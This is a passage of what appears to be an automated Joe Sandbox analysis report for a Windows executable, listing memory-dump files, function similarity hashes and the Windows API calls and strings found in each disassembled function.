                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CurrentOpenProcessThreadToken
                      • String ID:
                      • API String ID: 3974789173-0
                      • Opcode ID: 36f1bf7b3b92d47138f8f1c91134d3b16e3ee0e54a39439820d23083064ed173
                      • Instruction ID: 17ed5b796be43e08cf8af2d09abe57323313c47e1d2d53e8d06973e80250d6bc
                      • Opcode Fuzzy Hash: 36f1bf7b3b92d47138f8f1c91134d3b16e3ee0e54a39439820d23083064ed173
                      • Instruction Fuzzy Hash: 68E04F366423119FD7205FB26F0CF667BA8AF90796F094838E245E9050DE35844ACB61
                      APIs
                      • GetDesktopWindow.USER32 ref: 00EB2187
                      • GetDC.USER32(00000000), ref: 00EB2191
                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EB21B1
                      • ReleaseDC.USER32(?), ref: 00EB21D2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: 96c7a1f2c4d93123a5b09c6bc0ef093a801ce28a060d28dd282c10513dd2741e
                      • Instruction ID: cca3e0d9e271398c9f2f013c4fdbd4f189729166812027341e82e0ac667a93e4
                      • Opcode Fuzzy Hash: 96c7a1f2c4d93123a5b09c6bc0ef093a801ce28a060d28dd282c10513dd2741e
                      • Instruction Fuzzy Hash: B3E0C275800204AFDF019F61C848AAD7BB5AF88350F118429E95AE6220CB388145DF80
                      APIs
                      • GetDesktopWindow.USER32 ref: 00EB219B
                      • GetDC.USER32(00000000), ref: 00EB21A5
                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EB21B1
                      • ReleaseDC.USER32(?), ref: 00EB21D2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: ff9112df8721b5425a2b718dadd9dfc24416e1f66251e8157487e78256d8c9ca
                      • Instruction ID: ce2808d9d70f8783e4ccb0abb7033264b377b5faeb433a9367035784a5d66cdd
                      • Opcode Fuzzy Hash: ff9112df8721b5425a2b718dadd9dfc24416e1f66251e8157487e78256d8c9ca
                      • Instruction Fuzzy Hash: 63E0EEB5800204AFCF019FB2C8486AD7BF5AF8C310F128029F95AE7220CF389145DF80
                      APIs
                      • OleSetContainedObject.OLE32(?,00000001), ref: 00ECB981
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ContainedObject
                      • String ID: AutoIt3GUI$Container
                      • API String ID: 3565006973-3941886329
                      • Opcode ID: 947fb720ff1d4afdfeea4627ce8aeba1a75449c1d18c3e012e83de4984117b05
                      • Instruction ID: 1e94a1c234f6fe89456cfb1d47069a8d78deb2ebb3978e98db7afbe75d4a4e42
                      • Opcode Fuzzy Hash: 947fb720ff1d4afdfeea4627ce8aeba1a75449c1d18c3e012e83de4984117b05
                      • Instruction Fuzzy Hash: 9F915A71600601AFDB24DF28C985F6ABBE8FF48710F14956EF94AEB291DB71E841CB50
                      APIs
                        • Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9
                        • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                        • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                      • __wcsnicmp.LIBCMT ref: 00EDB298
                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EDB361
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                      • String ID: LPT
                      • API String ID: 3222508074-1350329615
                      • Opcode ID: fce0999d4ff9a27153ec04e22f958a2cba36bcf64fc393c7b54245156996a4cd
                      • Instruction ID: 3a465a682ce924f0aae2fead25a332bc6df60407a4938054f53c5dfb7688179a
                      • Opcode Fuzzy Hash: fce0999d4ff9a27153ec04e22f958a2cba36bcf64fc393c7b54245156996a4cd
                      • Instruction Fuzzy Hash: 6F615E75A00215EFCB14DB94C881EAEB7F4EF48310F15916AF54ABB391EB70AE41DB50
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: Oa
                      • API String ID: 4104443479-3945284152
                      • Opcode ID: b933f1dc5721b4631f065087ca5058abef2760ad5f60ea6215085c4097f8e8fb
                      • Instruction ID: cd13455c1ba5d1998a2df710f057b9266b69cbb102215f9f28376e6e0e65c6be
                      • Opcode Fuzzy Hash: b933f1dc5721b4631f065087ca5058abef2760ad5f60ea6215085c4097f8e8fb
                      • Instruction Fuzzy Hash: 5C5150B0900609DFCB64CF68C580AEEB7F5FF44308F14956AE85AE7350EB31A955CB51
                      APIs
                      • Sleep.KERNEL32(00000000), ref: 00E82AC8
                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E82AE1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: GlobalMemorySleepStatus
                      • String ID: @
                      • API String ID: 2783356886-2766056989
                      • Opcode ID: 53679ec3bb38b58cc40ddcd53a09f076142facb2637f636e2bf1700a6a98326a
                      • Instruction ID: 7e9f6451bef91ecded9a0bfb425c6bd3d82aecc688d7d6fe6de95767280c25d5
                      • Opcode Fuzzy Hash: 53679ec3bb38b58cc40ddcd53a09f076142facb2637f636e2bf1700a6a98326a
                      • Instruction Fuzzy Hash: 7C5137714187489BD320AF10D886BAFBBF8FFC5314F42885DF1D9611A6DB309929CB66
                      APIs
                        • Part of subcall function 00E7506B: __fread_nolock.LIBCMT ref: 00E75089
                      • _wcscmp.LIBCMT ref: 00ED9AAE
                      • _wcscmp.LIBCMT ref: 00ED9AC1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _wcscmp$__fread_nolock
                      • String ID: FILE
                      • API String ID: 4029003684-3121273764
                      • Opcode ID: 84398cb278c937ccf4ad75c87c856a4af1e16875cf850a7b03f7c2e9520847cf
                      • Instruction ID: 6474c8aa1021ab8394e145a084bd3872ae129af9638e291acfb153f11e08b0ef
                      • Opcode Fuzzy Hash: 84398cb278c937ccf4ad75c87c856a4af1e16875cf850a7b03f7c2e9520847cf
                      • Instruction Fuzzy Hash: 1341F672A00619BADF209AA0DC85FEFBBFDDF45714F01406BB904B7281DAB19E0587A1
                      APIs
                      • _memset.LIBCMT ref: 00EE2892
                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EE28C8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CrackInternet_memset
                      • String ID: |
                      • API String ID: 1413715105-2343686810
                      • Opcode ID: 66a5bd139204a22eae2abd7f69f4c7adc54faee2afd03109d5957d65935db42d
                      • Instruction ID: b6afdc7c3754e9335396d686871fe5bd7a297c526fa98d857aee77a3d827c37f
                      • Opcode Fuzzy Hash: 66a5bd139204a22eae2abd7f69f4c7adc54faee2afd03109d5957d65935db42d
                      • Instruction Fuzzy Hash: 49311871800119AFDF05EFA1CC85EEEBFB9FF08300F105029E959B6166DA325A56DBA0
                      APIs
                      • DestroyWindow.USER32(?,?,?,?), ref: 00EF6D86
                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EF6DC2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$DestroyMove
                      • String ID: static
                      • API String ID: 2139405536-2160076837
                      • Opcode ID: 2f3884e23dc74f3605087a11910b9bbb1d329492c20fb76af078113eea816bd5
                      • Instruction ID: 0c7cc15cb97c4f0a2b7f70309640ed7501b5792257649eed7e82b68544576dba
                      • Opcode Fuzzy Hash: 2f3884e23dc74f3605087a11910b9bbb1d329492c20fb76af078113eea816bd5
                      • Instruction Fuzzy Hash: 65315071210608AFDB109F74CC40AFB77B9FF88764F10A519FA99A7190DB71AC51DB60
                      APIs
                      • _memset.LIBCMT ref: 00ED2E00
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00ED2E3B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: InfoItemMenu_memset
                      • String ID: 0
                      • API String ID: 2223754486-4108050209
                      • Opcode ID: 5aaf7edda2fec8e044aae4ae897afd825c6bae75dd3ea3baff671416d672f7ae
                      • Instruction ID: f81f62eae11ed4fcdeedce57fdd7146d0ee9601563f74afc63e17708b9f0835a
                      • Opcode Fuzzy Hash: 5aaf7edda2fec8e044aae4ae897afd825c6bae75dd3ea3baff671416d672f7ae
                      • Instruction Fuzzy Hash: DA312731600305ABEB268F58C8447AEBBF5EF15354F14142FEE81F72A1D7709942CB50
                      APIs
                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EF69D0
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF69DB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: Combobox
                      • API String ID: 3850602802-2096851135
                      • Opcode ID: 678b2feca76aa4e95a5142433e39e4f148819211b8df88a3aa5dd7343d657a6d
                      • Instruction ID: c3fe5a44111553e85fb7ccd59609183264be7864207b50a9979b09dec2025b1a
                      • Opcode Fuzzy Hash: 678b2feca76aa4e95a5142433e39e4f148819211b8df88a3aa5dd7343d657a6d
                      • Instruction Fuzzy Hash: 4E11B67160020C7FEF119F14CC80EBB37AAEBC93A8F115124FA58AB290D6B1DC5187A0
                      APIs
                        • Part of subcall function 00E71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E71D73
                        • Part of subcall function 00E71D35: GetStockObject.GDI32(00000011), ref: 00E71D87
                        • Part of subcall function 00E71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E71D91
                      • GetWindowRect.USER32(00000000,?), ref: 00EF6EE0
                      • GetSysColor.USER32(00000012), ref: 00EF6EFA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                      • String ID: static
                      • API String ID: 1983116058-2160076837
                      • Opcode ID: fd12aa6c7783ff9095c7a827131918af55c263b9ee783f9dc433dafe6413003d
                      • Instruction ID: fd2de6a6369f235071cf17418216fec1c374b2507239ac50c3e669a2b3521250
                      • Opcode Fuzzy Hash: fd12aa6c7783ff9095c7a827131918af55c263b9ee783f9dc433dafe6413003d
                      • Instruction Fuzzy Hash: 78212972610209AFDB04DFA8DD45AFA7BB8FB48314F005629FE55E3250E734E861DB50
                      APIs
                      • GetWindowTextLengthW.USER32(00000000), ref: 00EF6C11
                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EF6C20
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: LengthMessageSendTextWindow
                      • String ID: edit
                      • API String ID: 2978978980-2167791130
                      • Opcode ID: 8f93d55676d8dddae9170baddc2beeea7b99bb23345b3525c3fd95a3a04f0919
                      • Instruction ID: 95fbce8e84aa454fbdb88543650fc3658f5ab21361a62fe7ff98fcefb6a120aa
                      • Opcode Fuzzy Hash: 8f93d55676d8dddae9170baddc2beeea7b99bb23345b3525c3fd95a3a04f0919
                      • Instruction Fuzzy Hash: 24116A7150020CABEB108F64DC45AFA3BAAEF54378F605724FAA5E71E0C775DC91AB60
                      APIs
                      • _memset.LIBCMT ref: 00ED2F11
                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00ED2F30
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: InfoItemMenu_memset
                      • String ID: 0
                      • API String ID: 2223754486-4108050209
                      • Opcode ID: 3a3b7cab45234a7401965f4a4c35208b374b4082c37554e9436fd9885280a8e5
                      • Instruction ID: eaf9d8e0cf83a94cbb92b4a4c3600371f282064636a68796521fc144b338a521
                      • Opcode Fuzzy Hash: 3a3b7cab45234a7401965f4a4c35208b374b4082c37554e9436fd9885280a8e5
                      • Instruction Fuzzy Hash: 7F11BE31E01118AFCB21DB98DC44BA973BAEB25318F0450AAEE44F73A0D7B0AD069791
                      APIs
                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EE2520
                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EE2549
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Internet$OpenOption
                      • String ID: <local>
                      • API String ID: 942729171-4266983199
                      • Opcode ID: f6fef275da535160833f346fc8be4a2eca0b26046cf273305082f704777517db
                      • Instruction ID: 566e9e8ecb35d84c02a7563ac01709dab19266d304667bd88a25130ea220a206
                      • Opcode Fuzzy Hash: f6fef275da535160833f346fc8be4a2eca0b26046cf273305082f704777517db
                      • Instruction Fuzzy Hash: 5311E370501669BEDB248F538C94EFBFF6CFF05355F10912EF60566040D2705948DAE1
                      APIs
                        • Part of subcall function 00EE830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00EE80C8,?,00000000,?,?), ref: 00EE8322
                      • inet_addr.WSOCK32(00000000), ref: 00EE80CB
                      • htons.WSOCK32(00000000), ref: 00EE8108
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ByteCharMultiWidehtonsinet_addr
                      • String ID: 255.255.255.255
                      • API String ID: 2496851823-2422070025
                      • Opcode ID: 440eec9577253bc7a9d13255b2d429ea0d398f0150d4d84f7ff85875939093cf
                      • Instruction ID: 0f25d439ca8f236bdcb1a6a67f35ce6691bd4815d92d9a0fde81af243d91fdb2
                      • Opcode Fuzzy Hash: 440eec9577253bc7a9d13255b2d429ea0d398f0150d4d84f7ff85875939093cf
                      • Instruction Fuzzy Hash: BD112130200249ABDB20AF65CD92FFEB364FF00320F10952BE919B72C2CA72A805C691
                      APIs
                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                        • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EC9355
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 372448540-1403004172
                      • Opcode ID: efc7a50bf31d676eeecb1b331107f2fe95a7c9456537b17f23f4ea0b3aaef77d
                      • Instruction ID: eda28815d3c456c2c631137ca55938997f5b324440f5fe31abfd5df1856bb11b
                      • Opcode Fuzzy Hash: efc7a50bf31d676eeecb1b331107f2fe95a7c9456537b17f23f4ea0b3aaef77d
                      • Instruction Fuzzy Hash: 6E014131A04214ABCB08EBA4CC82DFE73A8FF02320B142A1DF836772C2DB32580CC251
                      APIs
                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                        • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00EC924D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 372448540-1403004172
                      • Opcode ID: 9aad6fb609b4529043c5206580fc6072b81418aec040dc691c63ad92315084ef
                      • Instruction ID: d2a78b9b060069c48d6eb57594ed2b0beebb4542c3ab4a9925ad02cbaa3f6e53
                      • Opcode Fuzzy Hash: 9aad6fb609b4529043c5206580fc6072b81418aec040dc691c63ad92315084ef
                      • Instruction Fuzzy Hash: 0201D871B41104BBCB18E7A0DA97EFF73E8DF05300F141019B95673192EA515F0D9262
                      APIs
                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                        • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
